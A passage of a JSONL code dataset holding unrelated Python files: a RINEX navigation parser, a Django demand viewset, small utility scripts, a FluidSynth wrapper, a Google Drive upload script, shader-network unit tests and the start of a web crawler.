array_like\n List of strings, where each string is a line of nav data\n\n Returns\n -------\n array_like\n List of records containing data as passed in from `lines`\n '''\n\n # Assume lines contain complete records\n i = 0\n records = []\n record_length = len(rinex2_nav_record_line_formats)\n while i + record_length <= len(lines):\n record_lines = lines[i:i + record_length]\n record = {}\n for line, line_format, var_names in zip(record_lines, rinex2_nav_record_line_formats, rinex2_nav_record_var_names):\n values = parse_rinex_line(line, line_format)\n for key, val in zip(var_names, values):\n if key:\n record[key] = val\n records.append(record)\n i += record_length\n return records\n\n\ndef format_RINEX2_nav_records(records, century=2000):\n '''\n Take list of nav file records and sort into a dictionary with \n PRN as the key and a list of records sorted by epoch as the value\n\n Parameters\n ----------\n records : array_like\n List of strings, where each string is a line of nav data\n century : int\n Century during which the two-digit year should be interpreted.\n Default 2000.\n\n Returns\n -------\n array_like\n Dictionary of records containing data as passed in from `records`,\n keyed by PRN.\n '''\n \n ephemerides = {}\n \n # Look through each record and assign it to the respective PRN\n for record in records:\n sat_id = 'G{0:02}'.format(record['prn'])\n ephemeris_list = ephemerides.get(sat_id, [])\n eph = record.copy()\n # Add the epoch time as a datetime object\n eph['epoch'] = datetime(century + record['yy'], *(int(record[k]) for k in ['month', 'day', 'hour', 'minute', 'second']))\n ephemeris_list.append(eph)\n ephemerides[sat_id] = ephemeris_list\n\n # Sort the data by epoch for each PRN\n for key, ephemeris_list in ephemerides.items():\n ephemerides[sat_id] = sorted(ephemeris_list, key=lambda x: x['epoch'])\n\n return ephemerides\n\n\ndef parse_rinex(filepath, return_header=True):\n '''\n Given the filepath to a RINEX 2 navigation message file,\n parses and returns header and navigation ephemeris data.\n Automatically removes obsoleted (corrected) data.\n\n Parameters\n ----------\n filepath : str, file_like\n filepath to or open file object of RINEX 2 navigation file\n\n Returns\n -------\n array_like\n Vector of the form [header, nav_data] where header is a list\n containing the parsed header information and nav_data is a\n dictionary containing a list of the navigation records for each\n sat_id.\n '''\n \n try:\n with open(filepath, 'r') as f:\n lines = list(f.readlines())\n except TypeError:\n lines = list(filepath.readlines())\n \n # Parse out the header\n for i, line in enumerate(lines):\n if line.find('END OF HEADER') >= 0:\n break\n header_lines = lines[:i + 1]\n \n # Parse through the nav lines\n nav_lines = lines[i + 1:]\n records = parse_RINEX2_nav_records(nav_lines)\n ephemerides = format_RINEX2_nav_records(records)\n \n # Clean up ephemerides\n for prn in ephemerides:\n for ephem in ephemerides[prn]:\n del_index = []\n if ephem['t_oe'] % 3600 != 0:\n # Ephemeris was corrected!\n # Limit to 4 minutes away and remove any updates\n # that happened \"later\" in time\n for ii, e in enumerate(ephemerides[prn]):\n toe_diff = e['t_oe'] - ephem['t_oe']\n # If update is from less than 4 minutes in the future,\n # it should be superceded by this update\n if toe_diff < 4*60 and toe_diff > 0:\n # Keep track of each item to remove\n del_index.append(ii)\n # Remove all obsoleted data\n for ii in del_index:\n del ephemerides[prn][ii]\n \n if return_header:\n return header_lines, ephemerides\n else:\n return ephemerides\n","sub_path":"ASEN5090/HW9 v1/read_ephemeris.py","file_name":"read_ephemeris.py","file_ext":"py","file_size_in_byte":8116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"648743628","text":"from rest_framework.viewsets import ModelViewSet\nfrom rest_framework_jwt.authentication import JSONWebTokenAuthentication\nfrom rest_framework.permissions import IsAuthenticated, AllowAny\nfrom rest_framework.response import Response\nfrom django.utils import timezone\nfrom rest_framework import status\nfrom rest_framework.settings import api_settings\nfrom django.db.models import Count\nfrom rest_framework.decorators import action\nfrom django.core.mail import send_mail\nfrom django.conf import settings\n\nfrom .models import Demand\nfrom .serializers import DemandSerializer\nfrom users.permissions import IsDemandManager\nfrom .filters import DemandFilter\n\nclass DemandViewSet(ModelViewSet):\n queryset = Demand.objects.all().annotate(null_gut_matrix=Count('gut_matrix')).order_by('-null_gut_matrix', '-gut_matrix__gut' ,'-created_at')\n serializer_class = DemandSerializer\n permission_classes = (IsAuthenticated, IsDemandManager,)\n authentication_classes = (JSONWebTokenAuthentication,)\n filterset_class = DemandFilter\n\n # Override defalt destroy to method not allowed\n def destroy(self, request, *args, **kwargs):\n\n return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n @action(detail=True, methods=['post'], url_path='switch-status')\n def switch_status(self, request, *args, **kwargs):\n demand = self.get_object()\n\n if \"status\" not in request.POST:\n error_message = {\n \"status\": [\n \"Este campo é obrigatório.\"\n ]\n }\n \n return Response(status=status.HTTP_400_BAD_REQUEST, data=error_message)\n \n demand_status = request.POST.get['status']\n\n if demand_status != 'ABERTA' and demand_status != 'EM ANDAMENTO' and demand_status != 'FECHADA':\n error_message = {\n \"status\": [\n \"'\" + demand_status + \"' não é um escolha válida.\"\n ]\n }\n\n return Response(status=status.HTTP_400_BAD_REQUEST, data=error_message)\n\n elif demand_status == demand.status:\n error_message = {\n \"status\": [\n \"A demanda já está com o status '\" + demand_status + \"'.\"\n ]\n }\n\n return Response(status=status.HTTP_400_BAD_REQUEST, data=error_message)\n else:\n try:\n demand.status = demand_status\n demand.save()\n\n subject = \"O status da demanda '\" + demand.name + \"' foi atualizado!\"\n message = \"Olá \" + demand.requester + \", a demanda '\" + demand.name + \"' que você solicitou teve seu status atualizado para '\" + demand.status + \"'.\"\n email_from = settings.EMAIL_HOST_USER\n recipient_list = [demand.requester_email,]\n send_mail( subject, message, email_from, recipient_list)\n\n return Response(status=status.HTTP_200_OK)\n except Exception:\n return Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n ","sub_path":"demands/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"439539735","text":"import math\r\nimport csv\r\n\r\nwith open('P105data.csv',newline='') as f:\r\n data=csv.reader(f)\r\n file_data=list(data) \r\nfile_data=file_data[0]\r\n\r\nn=len(file_data)\r\ntotal=0\r\nfor x in file_data:\r\n total=total+int(x)\r\n \r\nmeam=total/n\r\n\r\n\r\nsquared_list=[]\r\nfor number in file_data:\r\n a=int(number)-meam\r\n a=a**2\r\n squared_list.append(a)\r\n\r\nsum=0\r\nfor i in squared_list:\r\n sum=sum+i\r\n\r\nresult=sum/(n-1)\r\nstd_dev=math.sqrt(result)\r\nprint(std_dev)\r\n","sub_path":"Class 105/p105.py","file_name":"p105.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"156356664","text":"#from distutils.core import setup\nfrom setuptools import setup, find_packages\n\n#This is a list of files to install, and where\n#(relative to the 'root' dir, where setup.py is)\n#You could be more specific.\n\nfiles = [\"assets/*\"]\n\n\nsetup(name = \"PID1\",\n version = \"0.01\",\n description = \"The python program to manage DGnet_Dist_PIDX repositories throug the GitHub API\",\n author = \"andriy\",\n author_email = \"andriy@dgnet.cloud\",\n url = \"https://github.com/andriykutsevol/DGnet_Dist_PID1.git\",\n #Name the folder where your packages live:\n #(If you have other packages (dirs) or modules (py files) then\n #put them into the package directory - they will be found \n #recursively.)\n #packages = ['PID1'],\n packages=find_packages(),\n #'package' package must contain files (see list above)\n #I called the package 'package' thus cleverly confusing the whole issue...\n #This dict maps the package name =to=> directories\n #It says, package *needs* these files.\n package_data = {'PID1' : files },\n \n setup_requires=[\n \t\t'PyGithub'\n ], \n \n install_requires=[\n 'PyGithub'\n ],\n #Some addiional script\n #scripts = [\"bin/funniest-joke\"],\n long_description = \"\"\"Really long text here.\"\"\" \n #\n #This next part it for the Cheese Shop, look a little down the page.\n #classifiers = [] \n) \n","sub_path":"PID1/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"649279585","text":"#괄호 제거\n\n#풀이과정\n\n#비트마스킹으로 못 풀겠어서 결국 인터넷 검색\n#'('')'의 짝을 인덱스로 가지는 배열을 만듬(enumerate 활용)\n#입력받은 값에서 () 를 다 없앰\n#인덱스 배열을 combinaitons 해서 가능한 조합을 배열에 삽입\n#정렬\n\n######################\n\nfrom itertools import combinations\nproblem = [*input().strip()] # 문자열 하나씩 리스트화\n\np, idx_brs = [],[]\n# 짝이 맞는 괄호의 위치 idx_brs에 저장해줌\nfor i,v in enumerate(problem):\n if v == '(':\n problem[i] =''\n p+=[i]\n if v == ')':\n problem[i] ='';\n idx_brs +=[[p.pop(),i]]\n\nout = set()\n\n# 짝이 맞는 괄호 위치를 조합을 통해 조정해줌\nfor i in range(len(idx_brs)):\n for j in combinations(idx_brs,i):\n P = problem[:]\n for v,w in j:\n P[v] = '('\n P[w] = ')'\n out.add(''.join(P))\nfor i in sorted(out):print(i)\n","sub_path":"백준/Python/2800.py","file_name":"2800.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"599762351","text":"import fluidsynth\nimport time, os, sys\nimport threading\nimport logging\nfrom sf2utils.sf2parse import Sf2File\n\n\nclass Fluidsynth:\n def __init__(self):\n self.Channel = 0\n self.SF2dir = \"/home/pi/soundfonts/sf2/\"\n self.SF2paths = {}\n self.SF2Path = self.buildSF2List()\n self.BankPatchList = self.getSF2bankpatchlist(self.SF2Path)\n\n self.name = \"FluidSynth\"\n self.driver = \"jack\"\n self.midi_driver = \"jack\"\n self.jackname = \"fluidsynth\"\n self.command_prompt = \"\\nFluidSynth initialization completed.\"\n\n def __del__(self):\n self.release()\n print(\"Destructor called, Fluidsynth stopped.\")\n\n def start(self, sf2path=None):\n if not sf2path:\n sf2path = self.SF2Path\n logging.info(\"Starting Engine {}\".format(self.name))\n self.fs = fluidsynth.Synth(gain=0.75, samplerate=48000)\n self.fs.setting(\"audio.jack.autoconnect\", 1)\n self.fs.setting(\"synth.polyphony\", 32)\n self.fs.setting(\"audio.period-size\", 64)\n self.fs.setting(\"audio.periods\", 4)\n self.fs.setting(\"audio.realtime-prio\", 99)\n self.fs.start(driver=self.driver, midi_driver=self.midi_driver)\n self.sfid = self.fs.sfload(sf2path)\n self.switchSF2(sf2path, 0, 0, 1)\n self.Bank = self.fs.channel_info(self.Channel)[1]\n self.Patch = self.fs.channel_info(self.Channel)[2]\n self.PatchName = self.fs.channel_info(self.Channel)[3]\n self.Index = self.BankPatchList.index([self.Bank, self.Patch])\n print(\"fluidsynth running...\")\n return\n\n def release(self):\n if self.fs:\n self.fs.delete()\n return\n\n def buildSF2List(self):\n for file in os.listdir(self.SF2dir):\n if file[-4:].lower() == \".sf2\":\n print(file)\n self.SF2paths.update({file[:-4]: (self.SF2dir + file)})\n return self.SF2paths[list(self.SF2paths.keys())[0]]\n\n def getSF2bankpatchlist(self, sf2path: str):\n \"\"\"\n Gets a nested list of the banks and patches in use by the soundfont\n (yes it's a horribly nested one liner, but it works)\n \"\"\"\n with open(sf2path, \"rb\") as sf2_file:\n sf2 = Sf2File(sf2_file)\n\n return [\n [int(i[0]), int(i[1])]\n for i in [\n i.split(\":\")\n for i in sorted([i[7:14] for i in str(sf2.presets)[1:-1].split(\", \")])[\n :-1\n ]\n ]\n ]\n\n def switchSF2(self, sf2path: str, channel: int, bank: int, patch: int):\n \"\"\"\n Changes the current soundfont, patch, and bank for a given channel, and changes the current values to represent that.\n \"\"\"\n self.BankPatchList = self.getSF2bankpatchlist(sf2path)\n self.Channel = channel\n self.Bank = bank\n self.Patch = patch\n self.fs.program_select(self.Channel, self.sfid, self.Bank, self.Patch)\n self.PatchName = self.fs.channel_info(self.Channel)[3]\n return\n\n def nextPatch(self, direction):\n \"\"\"\n Finds next non empty patch, moving to the next bank if needs be.\n Max bank 128 before it loops around to 0.\n \"\"\"\n if direction == \"up\":\n if (self.Index + 1) == len(self.BankPatchList):\n self.Index = 0\n else:\n self.Index += 1\n if direction == \"down\":\n if self.Index == 0:\n self.Index = len(self.BankPatchList) - 1\n else:\n self.Index -= 1\n [self.Bank, self.Patch] = self.BankPatchList[self.Index]\n self.fs.program_select(self.Channel, self.sfid, self.Bank, self.Patch)\n print(self.fs.channel_info(self.Channel))\n self.PatchName = self.fs.channel_info(self.Channel)[3]\n return [\n self.PatchName,\n \"Bank \" + str(self.Bank) + \" Patch \" + str(self.Patch),\n ]\n\n def bgBankPatchCheck(self):\n \"\"\"\n Checks if the bank and/or patch has changed in the background without us noticing.\n \"\"\"\n while True:\n if (self.Bank != self.fs.channel_info(self.Channel)[1]) | (\n self.Patch != self.fs.channel_info(self.Channel)[2]\n ):\n self.Bank = fs.channel_info(self.Channel)[1]\n self.Patch = fs.channel_info(self.Channel)[2]\n self.PatchName = fs.channel_info(self.Channel)[3]\n # if not inMenu:\n # # change the text too\n # display_message([currPatchName, 'Bank ' + str(currBank) +\n # ' Patch ' + str(currPatch)],\n # static=True)\n time.sleep(0.1)\n\n # bg_thread = threading.Thread(target=bgBankPatchCheck, daemon=True)\n # bg_thread.start()\n","sub_path":"includes/fluidsynth.py","file_name":"fluidsynth.py","file_ext":"py","file_size_in_byte":4874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"517959384","text":"from apiclient.discovery import build\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom httplib2 import Http\nfrom apiclient.http import MediaFileUpload\nimport datetime\nimport socket\n\n\nscopes = ['https://www.googleapis.com/auth/drive']\n\ncredentials = ServiceAccountCredentials.from_json_keyfile_name('/home/debian/google/credentials.json', scopes)\n\nhttp_auth = credentials.authorize(Http())\ndrive = build('drive', 'v3', http=http_auth)\n\nrequest = drive.files().list().execute()\nfiles = request.get('items', [])\nfor f in files:\n print(\"File list:\",f)\n\n\nnow = datetime.datetime.now()\nhost = socket.gethostname()\nstamp=str(now.year)+\"_\"+str(now.month)+\"_\"+str(now.day)+\"_\"+str(now.hour)+\"_\"+str(now.minute)+\"_\"+str(host)+\".mp4\"\n\nfolder_id = '1nIClELa_-tbI3UtV-glpG2qtcet_kJOH' #server\nfolder_id = '1ccABX1N63zHbHmCUCus3XH4lZfMhkSUd' #video\nfile_metadata = {\n 'name': stamp,\n 'parents': [folder_id]\n}\nmedia = MediaFileUpload('/home/debian/video/video.mp4',\n mimetype='image/jpeg',\n resumable=True)\nprint(\"Uploading..\",stamp);\nfile = drive.files().create(body=file_metadata,\n media_body=media,\n fields='id').execute()\nprint ('File ID:', file.get('id'))\nexit()\n","sub_path":"run_on_bbb/service_account.py","file_name":"service_account.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"416781225","text":"##########################################################################\n#\n# Copyright (c) 2018, Image Engine Design Inc. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer.\n#\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided with\n# the distribution.\n#\n# * Neither the name of John Haddon nor the names of\n# any other contributors to this software may be used to endorse or\n# promote products derived from this software without specific prior\n# written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS\n# IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n##########################################################################\n\nimport unittest\n\nimport imath\n\nimport IECore\nimport IECoreScene\n\nclass ShaderNetworkAlgoTest( unittest.TestCase ) :\n\n\tdef testAddShaders( self ) :\n\n\t\tn1 = IECoreScene.ShaderNetwork(\n\t\t\tshaders = {\n\t\t\t\t\"out\" : IECoreScene.Shader( \"lambert\", \"surface\" ),\n\t\t\t\t\"texture\" : IECoreScene.Shader( \"file\", \"shader\" ),\n\t\t\t},\n\t\t\toutput = ( \"out\", \"\" )\n\t\t)\n\n\t\tn2 = IECoreScene.ShaderNetwork(\n\t\t\tshaders = {\n\t\t\t\t\"manifold\" : IECoreScene.Shader( \"uv\", \"shader\" ),\n\t\t\t\t\"texture\" : IECoreScene.Shader( \"noise\", \"shader\" ),\n\t\t\t},\n\t\t\tconnections = [\n\t\t\t\t( ( \"manifold\", \"\" ), ( \"texture\", \"manifold\" ) ),\n\t\t\t],\n\t\t\toutput = ( \"texture\", \"\" )\n\t\t)\n\n\t\tc = n1.copy()\n\t\tp = IECoreScene.ShaderNetworkAlgo.addShaders( c, n2 )\n\t\tself.assertEqual( p, IECoreScene.ShaderNetwork.Parameter( \"texture1\", \"\" ) )\n\n\t\tself.assertEqual(\n\t\t\tc.shaders(),\n\t\t\t{\n\t\t\t\t\"out\" : n1.getShader( \"out\" ),\n\t\t\t\t\"texture\" : n1.getShader( \"texture\" ),\n\t\t\t\t\"manifold\" : n2.getShader( \"manifold\" ),\n\t\t\t\t\"texture1\" : n2.getShader( \"texture\" ),\n\t\t\t}\n\t\t)\n\n\t\tself.assertEqual(\n\t\t\tc.inputConnections( \"texture1\" ),\n\t\t\t[ c.Connection( ( \"manifold\", \"\" ), ( \"texture1\", \"manifold\" ) ) ],\n\t\t)\n\n\tdef testRemoveUnusedShaders( self ) :\n\n\t\tn = IECoreScene.ShaderNetwork(\n\t\t\tshaders = {\n\t\t\t\t\"used1\" : IECoreScene.Shader(),\n\t\t\t\t\"used2\" : IECoreScene.Shader(),\n\t\t\t\t\"used3\" : IECoreScene.Shader(),\n\t\t\t\t\"unused1\" : IECoreScene.Shader(),\n\t\t\t\t\"unused2\" : IECoreScene.Shader(),\n\t\t\t\t\"unused3\" : IECoreScene.Shader(),\n\t\t\t},\n\t\t\tconnections = [\n\t\t\t\t( ( \"used1\", \"out\" ), ( \"used2\", \"in\" ) ),\n\t\t\t\t( ( \"used2\", \"out\" ), ( \"used3\", \"in\" ) ),\n\t\t\t\t( ( \"unused1\", \"out\" ), ( \"unused2\", \"in\" ) ),\n\t\t\t\t( ( \"unused2\", \"out\" ), ( \"unused3\", \"in\" ) ),\n\t\t\t],\n\t\t\toutput = ( \"used3\", \"\" ),\n\t\t)\n\n\t\tIECoreScene.ShaderNetworkAlgo.removeUnusedShaders( n )\n\t\tself.assertEqual( set( n.shaders().keys() ), { \"used1\", \"used2\", \"used3\" } )\n\n\tdef testConvertColorComponentOutputConnection( self ) :\n\n\t\t# OSL < 1.10\n\n\t\tn = IECoreScene.ShaderNetwork(\n\t\t\tshaders = {\n\t\t\t\t\"texture\" : IECoreScene.Shader( \"noise\", \"osl:shader\" ),\n\t\t\t\t\"surface\" : IECoreScene.Shader( \"plastic\", \"osl:surface\" ),\n\t\t\t},\n\t\t\tconnections = [\n\t\t\t\t( ( \"texture\", \"out.r\" ), ( \"surface\", \"Kd\" ) ),\n\t\t\t\t( ( \"texture\", \"out.g\" ), ( \"surface\", \"Ks\" ) ),\n\t\t\t\t( ( \"texture\", \"out.g\" ), ( \"surface\", \"Kt\" ) ),\n\t\t\t],\n\t\t\toutput = \"surface\"\n\t\t)\n\n\t\tself.assertEqual( len( n ), 2 )\n\n\t\tIECoreScene.ShaderNetworkAlgo.convertOSLComponentConnections( n )\n\t\tself.assertEqual( len( n ), 4 )\n\n\t\tself.assertEqual( len( n.inputConnections( \"surface\" ) ), 3 )\n\t\tself.assertEqual( len( n.inputConnections( \"texture\" ) ), 0 )\n\n\t\tkdInput = n.input( ( \"surface\", \"Kd\" ) )\n\t\tself.assertEqual( kdInput.name, \"out\" )\n\t\tself.assertEqual( n.getShader( kdInput.shader ).type, \"osl:shader\" )\n\t\tself.assertEqual( n.getShader( kdInput.shader ).name, \"MaterialX/mx_swizzle_color_float\" )\n\t\tself.assertEqual( n.getShader( kdInput.shader ).parameters[\"channels\"].value, \"r\" )\n\n\t\tksInput = n.input( ( \"surface\", \"Ks\" ) )\n\t\tself.assertEqual( ksInput.name, \"out\" )\n\t\tself.assertEqual( n.getShader( ksInput.shader ).type, \"osl:shader\" )\n\t\tself.assertEqual( n.getShader( ksInput.shader ).name, \"MaterialX/mx_swizzle_color_float\" )\n\t\tself.assertEqual( n.getShader( ksInput.shader ).parameters[\"channels\"].value, \"g\" )\n\n\t\tself.assertEqual( n.input( ( \"surface\", \"Kt\" ) ), ksInput )\n\n\t\t# OSL > 1.10\n\n\t\tn = IECoreScene.ShaderNetwork(\n\t\t\tshaders = {\n\t\t\t\t\"texture\" : IECoreScene.Shader( \"noise\", \"osl:shader\" ),\n\t\t\t\t\"surface\" : IECoreScene.Shader( \"plastic\", \"osl:surface\" ),\n\t\t\t},\n\t\t\tconnections = [\n\t\t\t\t( ( \"texture\", \"out.r\" ), ( \"surface\", \"Kd\" ) ),\n\t\t\t\t( ( \"texture\", \"out.g\" ), ( \"surface\", \"Ks\" ) ),\n\t\t\t\t( ( \"texture\", \"out.g\" ), ( \"surface\", \"Kt\" ) ),\n\t\t\t],\n\t\t\toutput = \"surface\"\n\t\t)\n\n\t\tself.assertEqual( len( n ), 2 )\n\n\t\tIECoreScene.ShaderNetworkAlgo.convertOSLComponentConnections( n, 11000 )\n\t\tself.assertEqual( len( n ), 2 )\n\n\t\tself.assertEqual( len( n.inputConnections( \"surface\" ) ), 3 )\n\t\tself.assertEqual( len( n.inputConnections( \"texture\" ) ), 0 )\n\n\t\tself.assertEqual( n.input( ( \"surface\", \"Kd\" ) ), ( \"texture\", \"out[0]\" ) )\n\t\tself.assertEqual( n.input( ( \"surface\", \"Ks\" ) ), ( \"texture\", \"out[1]\" ) )\n\t\tself.assertEqual( n.input( ( \"surface\", \"Kt\" ) ), ( \"texture\", \"out[1]\" ) )\n\n\tdef testConvertColorComponentInputConnection( self ) :\n\n\t\t# OSL < 1.10\n\n\t\tn = IECoreScene.ShaderNetwork(\n\t\t\tshaders = {\n\t\t\t\t\"texture1\" : IECoreScene.Shader( \"floatNoise\", \"osl:shader\" ),\n\t\t\t\t\"texture2\" : IECoreScene.Shader( \"floatNoise\", \"osl:shader\" ),\n\t\t\t\t\"surface\" : IECoreScene.Shader(\n\t\t\t\t\t\"plastic\", \"osl:surface\",\n\t\t\t\t\tparameters = { \"Cs\" : imath.Color3f( 0.2, 0.3, 0.4 ) }\n\t\t\t\t)\n\t\t\t},\n\t\t\tconnections = [\n\t\t\t\t( ( \"texture1\", \"out\" ), ( \"surface\", \"Cs.r\" ) ),\n\t\t\t\t( ( \"texture2\", \"out\" ), ( \"surface\", \"Cs.b\" ) ),\n\t\t\t],\n\t\t\toutput = \"surface\"\n\t\t)\n\n\t\tself.assertEqual( len( n ), 3 )\n\n\t\tIECoreScene.ShaderNetworkAlgo.convertOSLComponentConnections( n )\n\t\tself.assertEqual( len( n ), 4 )\n\n\t\tself.assertFalse( n.input( ( \"surface\", \"Cs.r\" ) ) )\n\t\tself.assertFalse( n.input( ( \"surface\", \"Cs.g\" ) ) )\n\t\tself.assertFalse( n.input( ( \"surface\", \"Cs.b\" ) ) )\n\n\t\tcsInput = n.input( ( \"surface\", \"Cs\" ) )\n\t\tself.assertEqual( csInput.name, \"out\" )\n\n\t\tpackShader = n.getShader( csInput.shader )\n\t\tself.assertEqual( packShader.name, \"MaterialX/mx_pack_color\" )\n\t\tself.assertEqual( packShader.type, \"osl:shader\" )\n\n\t\tself.assertEqual( packShader.parameters[\"in1\"], IECore.FloatData( 0.2 ) )\n\t\tself.assertEqual( packShader.parameters[\"in2\"], IECore.FloatData( 0.3 ) )\n\t\tself.assertEqual( packShader.parameters[\"in3\"], IECore.FloatData( 0.4 ) )\n\n\t\tself.assertEqual( n.input( ( csInput.shader, \"in1\" ) ), ( \"texture1\", \"out\" ) )\n\t\tself.assertEqual( n.input( ( csInput.shader, \"in2\" ) ), ( \"\", \"\" ) )\n\t\tself.assertEqual( n.input( ( csInput.shader, \"in3\" ) ), ( \"texture2\", \"out\" ) )\n\n\t\t# OSL > 1.10\n\n\t\tn = IECoreScene.ShaderNetwork(\n\t\t\tshaders = {\n\t\t\t\t\"texture1\" : IECoreScene.Shader( \"floatNoise\", \"osl:shader\" ),\n\t\t\t\t\"texture2\" : IECoreScene.Shader( \"floatNoise\", \"osl:shader\" ),\n\t\t\t\t\"surface\" : IECoreScene.Shader(\n\t\t\t\t\t\"plastic\", \"osl:surface\",\n\t\t\t\t\tparameters = { \"Cs\" : imath.Color3f( 0.2, 0.3, 0.4 ) }\n\t\t\t\t)\n\t\t\t},\n\t\t\tconnections = [\n\t\t\t\t( ( \"texture1\", \"out\" ), ( \"surface\", \"Cs.r\" ) ),\n\t\t\t\t( ( \"texture2\", \"out\" ), ( \"surface\", \"Cs.b\" ) ),\n\t\t\t],\n\t\t\toutput = \"surface\"\n\t\t)\n\n\t\tself.assertEqual( len( n ), 3 )\n\n\t\tIECoreScene.ShaderNetworkAlgo.convertOSLComponentConnections( n, 11000 )\n\t\tself.assertEqual( len( n ), 3 )\n\n\t\tself.assertEqual( n.input( ( \"surface\", \"Cs[0]\" ) ), ( \"texture1\", \"out\" ) )\n\t\tself.assertEqual( n.input( ( \"surface\", \"Cs[2]\" ) ), ( \"texture2\", \"out\" ) )\n\n\t\tself.assertFalse( n.input( ( \"surface\", \"Cs.r\" ) ) )\n\t\tself.assertFalse( n.input( ( \"surface\", \"Cs.g\" ) ) )\n\t\tself.assertFalse( n.input( ( \"surface\", \"Cs.b\" ) ) )\n\n\tdef testArnoldComponentConnectionsNotConverted( self ) :\n\n\t\tn = IECoreScene.ShaderNetwork(\n\t\t\tshaders = {\n\t\t\t\t\"flat1\" : IECoreScene.Shader( \"flat\", \"ai:shader\" ),\n\t\t\t\t\"flat2\" : IECoreScene.Shader( \"flat\", \"ai:surface\" ),\n\t\t\t},\n\t\t\tconnections = [\n\t\t\t\t( ( \"flat1\", \"r\" ), ( \"flat2\", \"color.g\" ) )\n\t\t\t],\n\t\t\toutput = \"flat2\"\n\t\t)\n\n\t\tn2 = n.copy()\n\t\tIECoreScene.ShaderNetworkAlgo.convertOSLComponentConnections( n2 )\n\t\tself.assertEqual( n, n2 )\n\n\tdef testConvertObjectVector( self ) :\n\n\t\tobjectVector = IECore.ObjectVector( [\n\t\t\tIECoreScene.Shader( \"noise\", parameters = { \"__handle\" : \"textureHandle\" } ),\n\t\t\tIECoreScene.Shader( \"standard_surface\", parameters = { \"base\" : \"link:textureHandle.r\", \"base_color\" : \"link:textureHandle\" } ),\n\t\t] )\n\n\t\tshaderNetwork = IECoreScene.ShaderNetwork(\n\t\t\tshaders = {\n\t\t\t\t\"textureHandle\" : IECoreScene.Shader( \"noise\" ),\n\t\t\t\t\"shader\" : IECoreScene.Shader( \"standard_surface\" ),\n\t\t\t},\n\t\t\tconnections = [\n\t\t\t\t( ( \"textureHandle\", \"r\" ), ( \"shader\", \"base\" ) ),\n\t\t\t\t( ( \"textureHandle\" ), ( \"shader\", \"base_color\" ) ),\n\t\t\t],\n\t\t\toutput = \"shader\",\n\t\t)\n\n\t\tself.assertEqual( IECoreScene.ShaderNetworkAlgo.convertObjectVector( objectVector ), shaderNetwork )\n\nif __name__ == \"__main__\":\n\tunittest.main()\n","sub_path":"test/IECoreScene/ShaderNetworkAlgoTest.py","file_name":"ShaderNetworkAlgoTest.py","file_ext":"py","file_size_in_byte":9792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"619488431","text":"\n\"\"\"\n A Web crawler is an Internet bot which helps in Web indexing. They crawl one page at a time through a website until\n all pages have been indexed. Web crawlers help in collecting information about a website and the links related to\n them, and also help in validating the HTML code and hyperlinks.\n\n Just a def from Internet (First one I Found).\n\n Uses BeautifulSoup as core and request for communication.\n Also, Some Regular Expressions are involved.\n\n Way Forward,\n Using user inputs to make crawling more efficient (Thinking of a base json structure).\n\n\"\"\"\n\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\n\nclass Spidy:\n\n def __init__(self, starting_url, depth, file_name):\n \"\"\"\n :param starting_url: Base URL to crawl\n :param depth: How much it should jump from one url to another\n :param file_name: path of the output file\n \"\"\"\n self.starting_url = starting_url\n self.depth = depth\n self.file_name = file_name\n self.name = \"\"\n\n def crawl(self):\n # getting links from the given url\n # appending links in class variable\n current_depth = 0\n depth_links = [self.get_links(self.starting_url)]\n\n while current_depth <= self.depth:\n current_links = []\n for link in depth_links[current_depth]:\n # getting new links and extending them\n current_links.extend(self.get_links(link))\n # writing into text file\n fio = open(self.file_name, \"a\")\n fio.write('Link ' + str(link) + ' Name ' + self.name + ' Depth ' + str(current_depth) + \"\\n\")\n fio.close()\n # increasing the current depth by 1\n current_depth += 1\n # appending all the current links into depth_links\n depth_links.append(current_links)\n\n def get_links(self, link):\n link_temp = []\n\n # getting the web page\n starting = requests.get(link)\n # converting it into simple html text\n starting_page = starting.text\n # creating and initializing object of the class beautifulSoup (import required)\n page = 